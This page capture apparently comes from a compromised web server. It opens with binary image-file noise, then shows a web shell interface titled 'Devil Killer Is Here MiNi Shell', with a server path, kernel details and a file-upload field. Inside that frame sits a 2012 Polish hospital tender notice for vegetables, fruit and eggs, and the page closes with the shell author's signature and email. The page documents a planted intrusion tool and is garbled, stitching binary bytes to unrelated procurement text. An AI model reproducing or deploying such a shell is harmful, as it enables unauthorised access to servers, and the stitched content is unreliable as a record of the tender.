JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120416/118958-N-2012.html

<p class="kh_header"><b>Radom: Zakup i dostawa warzyw, owoców, jaj dla potrzeb Działu Żywienia 
Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 118958 - 2012; data zamieszczenia: 16.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa warzyw, owoców, jaj dla potrzeb Działu Żywienia 
Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 - Warzywa i owoce

Lp.	Rodzaj artykułu	J.m. 	Orientacyjna ilość na okres 2 lat  /j.m./	Wielkość opakowania jednostkowego
1.	2.	3.	4.	5.
1.	Marchew	kg	32640	Worek-10kg
2.	Pietruszka korzeń	kg	7440	Worek-5kg
3.	Pietruszka zielona nać	kg	624	1 kg
4.	Por	kg	1320	Worek-5kg
5.	Seler korzeń	kg	8640	Worek-5kg
6.	Cebula	kg	3120	Worek-10kg
7.	Buraki	kg	17520	Worek-15kg
8.	Kapusta biała	kg	3360	Worek-25kg
9.	Kapusta kiszona	kg	3600	Wiaderko 5-10kg
10.	Kapusta czerwona	kg	1800	Worek-10kg
11.	Kapusta pekińska	kg	1800	Worek-5kg
12.	Ogórki świeże	kg	1200	5 kg
13.	Ogórki kiszone	kg	3000	Wiaderko 5-7kg
14.	Pomidory świeże	kg	1400	Paleta 5-7kg
15.	Jabłka	kg	9840	Skrzynka 10-15kg
16.	Sałata	szt.	4800	Skrzynka 16-18szt.
17.	Koper	kg	408	1 kg
18.	Rzodkiewka	pęczek	2240	10 pęcz.
19.	Pieczarki	kg	360	Skrzynka 4-5kg
20.	Szczypiorek	pęczek	920	10 pęcz.
21.	Kalafior	szt.	1040	1 szt.
22.	Ziemniaki stare irga	kg	120 000	Worek-15kg
23.	Ziemniaki młode	kg	10 200	Worek-15kg
24.	Brokuły	szt.	160	1 szt.
25.	Fasolka szparagowa zielona	kg	420	Worek-5kg
26.	Papryka świeża	kg	232	Worek-5kg
27.	Brukselka	kg	140	Worek-5kg
28.	Botwina	kg	200	1 pęcz.
29.	Śliwki węgierki	kg	120	1 kg
30.	Truskawki	kg	120	2 kg
31.	Wiśnie	kg	160	1 kg
32.	Jagody	kg	20	1 kg
33.	Sałata lodowa	szt.	960	
34.	Sałata karbowana-zielona	szt.	960	
35.	Sałata karbowana - bordowa	szt.	960	
36.	Seler naciowy	kg	288	
37.	Cykoria	kg	288	
38.	Jarmuż	szt.	288	
39.	Pomidory koktajlowe	kg	48	
40.	Cebula czerwona	kg	120	
41.	Kapusta włoska	kg	288	
42.	Roszponka	kg	288	100 g
43.	Rukola	kg	288	100 g
44.	Biała rzepa	kg	288	
45.	Mandarynki	kg	96	
46.	Gruszki	kg	168	
47.	Brzoskwinie	kg	96	koszyk
48.	Banany	kg	96	
49.	Cytryny	kg	96	
50.	Pomarańcze	kg	96	
51.	Winogron biały	kg	96	
52.	Winogron czerwony	kg	96.	


Zamawiający wymaga, aby towar dopuszczony do obrotu był:
- świeży, czysty, zdrowy, wolny od szkodników, nie zdrewniały, bez uszkodzeń mechanicznych
- nie posiadający oznak gnilnych oraz innych oznak zepsucia, bez obcych zapachów.

Warunki dostawy:
- dostawa towaru - 2 razy w tygodniu (wtorek, piątek)
- dostawa - w ciągu 24 godz. od dnia złożenia zamówienia
- kiszonki - dostarczane w wiaderkach plastikowych 5-10 kg
- pozostałe warzywa - w skrzynkach lub workach 10-30 kg
- ocena jakości towaru - w dniu dostawy
- towar określony w pozycjach 1-11, 13, 15, 19, 22 będzie zamawiany cały rok
- towar określony w pozycjach 12,14, 16, 17, 18, 20 będzie zamawiany w większych ilościach sezonowo, w mniejszych cały rok
- towar określony w pozycjach 21, 23-32 będzie zamawiany w sezonie
- owoce cytrusowe będą zamawiane w razie potrzeby - np. przyjęcia okolicznościowe
- towar określony w pozycjach 33-52 będzie zamawiany w zależności od potrzeb.

Część nr 2 - Jaja

Lp.	Rodzaj artykułu	Orientacyjna ilość szt. na okres 2 lat  
1.	2.	3.
1.	Jaja świeże, wielkość - L	140 000.

Warunki dostawy: 
1) dostawa raz w tygodniu w godzinach od 8:00 - 12:00 w dni robocze
2) realizacja zamówienia w dniu następującym po dniu złożenia zamówienia 
3) do każdej dostawy, na każdą partię określonego produktu, Wykonawca dołączy:
- Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16.12.2005r. 
o produktach pochodzenia zwierzęcego (Dz. U. 2006 Nr 17. Poz.127 ) 
- etykietę zawierająca minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.12.00-8, 03.22.13.00-9, 03.22.14.00-0, 03.22.22.00-5, 03.22.23.00-6, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje środkiem transportu drogowego do przewozu środków spożywczych zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19 grudnia 2002r. (Dz. U. Nr 21 poz. 179 z 2003r.) tj. dokumentem dopuszczającym samochód dostawcy do transportu żywności - dotyczy części nr 1 - warzywa i owoce oraz części nr 2 - jaja.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- w zakresie potwierdzenia spełniania warunku określonego w pkt. 10.1.2.a) - aktualny dokument dot. badań w kierunku pał. Salmonelli potwierdzający aktualny nadzór weterynaryjny nad fermą - dotyczy części nr 2 - jaja.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty tj.
- wpis do KRS lub Ewidencji Działalności Gospodarczej - które mogą być złożone 
w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub
- pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.    Wypełniony formularz oferty.
3.    Wypełnione formularz cenowy/ specyfikacja techniczna dla części nr 1 
4.   Wypełniony formularz oceny oferty dla części nr 1, w kryterium cena - zał. nr 4 
do oferty
5. Wypełniony formularz cenowy/ specyfikacja techniczna dla części nr 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany umowy:
1)	Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
2)	Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4  26-610 Radom (III piętro pok. 313 - Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 12:00, miejsce: Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4  26-610  Radom, w pok. nr 411 (Sala Konferencyjna), IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Rodzaj artykułu	J.m. 	Orientacyjna ilość na okres 2 lat  /j.m./	Wielkość opakowania jednostkowego
1.	2.	3.	4.	5.
1.	Marchew	kg	32640	Worek-10kg
2.	Pietruszka korzeń	kg	7440	Worek-5kg
3.	Pietruszka zielona nać	kg	624	1 kg
4.	Por	kg	1320	Worek-5kg
5.	Seler korzeń	kg	8640	Worek-5kg
6.	Cebula	kg	3120	Worek-10kg
7.	Buraki	kg	17520	Worek-15kg
8.	Kapusta biała	kg	3360	Worek-25kg
9.	Kapusta kiszona	kg	3600	Wiaderko 5-10kg
10.	Kapusta czerwona	kg	1800	Worek-10kg
11.	Kapusta pekińska	kg	1800	Worek-5kg
12.	Ogórki świeże	kg	1200	5 kg
13.	Ogórki kiszone	kg	3000	Wiaderko 5-7kg
14.	Pomidory świeże	kg	1400	Paleta 5-7kg
15.	Jabłka	kg	9840	Skrzynka 10-15kg
16.	Sałata	szt.	4800	Skrzynka 16-18szt.
17.	Koper	kg	408	1 kg
18.	Rzodkiewka	pęczek	2240	10 pęcz.
19.	Pieczarki	kg	360	Skrzynka 4-5kg
20.	Szczypiorek	pęczek	920	10 pęcz.
21.	Kalafior	szt.	1040	1 szt.
22.	Ziemniaki stare irga	kg	120 000	Worek-15kg
23.	Ziemniaki młode	kg	10 200	Worek-15kg
24.	Brokuły	szt.	160	1 szt.
25.	Fasolka szparagowa zielona	kg	420	Worek-5kg
26.	Papryka świeża	kg	232	Worek-5kg
27.	Brukselka	kg	140	Worek-5kg
28.	Botwina	kg	200	1 pęcz.
29.	Śliwki węgierki	kg	120	1 kg
30.	Truskawki	kg	120	2 kg
31.	Wiśnie	kg	160	1 kg
32.	Jagody	kg	20	1 kg
33.	Sałata lodowa	szt.	960	
34.	Sałata karbowana-zielona	szt.	960	
35.	Sałata karbowana - bordowa	szt.	960	
36.	Seler naciowy	kg	288	
37.	Cykoria	kg	288	
38.	Jarmuż	szt.	288	
39.	Pomidory koktajlowe	kg	48	
40.	Cebula czerwona	kg	120	
41.	Kapusta włoska	kg	288	
42.	Roszponka	kg	288	100 g
43.	Rukola	kg	288	100 g
44.	Biała rzepa	kg	288	
45.	Mandarynki	kg	96	
46.	Gruszki	kg	168	
47.	Brzoskwinie	kg	96	koszyk
48.	Banany	kg	96	
49.	Cytryny	kg	96	
50.	Pomarańcze	kg	96	
51.	Winogron biały	kg	96	
52.	Winogron czerwony	kg	96.	


Zamawiający wymaga, aby towar dopuszczony do obrotu był:
- świeży, czysty, zdrowy, wolny od szkodników, nie zdrewniały, bez uszkodzeń mechanicznych
- nie posiadający oznak gnilnych oraz innych oznak zepsucia, bez obcych zapachów.

Warunki dostawy:
- dostawa towaru - 2 razy w tygodniu (wtorek, piątek)
- dostawa - w ciągu 24 godz. od dnia złożenia zamówienia
- kiszonki - dostarczane w wiaderkach plastikowych 5-10 kg
- pozostałe warzywa - w skrzynkach lub workach 10-30 kg
- ocena jakości towaru - w dniu dostawy
- towar określony w pozycjach 1-11, 13, 15, 19, 22 będzie zamawiany cały rok
- towar określony w pozycjach 12,14, 16, 17, 18, 20 będzie zamawiany w większych ilościach sezonowo, w mniejszych cały rok
- towar określony w pozycjach 21, 23-32 będzie zamawiany w sezonie
- owoce cytrusowe będą zamawiane w razie potrzeby - np. przyjęcia okolicznościowe
- towar określony w pozycjach 33-52 będzie zamawiany w zależności od potrzeb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.12.00-8, 03.22.13.00-9, 03.22.14.00-0, 03.22.21.10-7, 03.22.22.00-5, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Rodzaj artykułu	Orientacyjna ilość szt. na okres 2 lat  
1.	2.	3.
1.	Jaja świeże, wielkość - L	140 000.

Warunki dostawy: 
1) dostawa raz w tygodniu w godzinach od 8:00 - 12:00 w dni robocze
2) realizacja zamówienia w dniu następującym po dniu złożenia zamówienia 
3) do każdej dostawy, na każdą partię określonego produktu, Wykonawca dołączy:
- Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16.12.2005r. 
o produktach pochodzenia zwierzęcego (Dz. U. 2006 Nr 17. Poz.127 ) 
- etykietę zawierająca minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com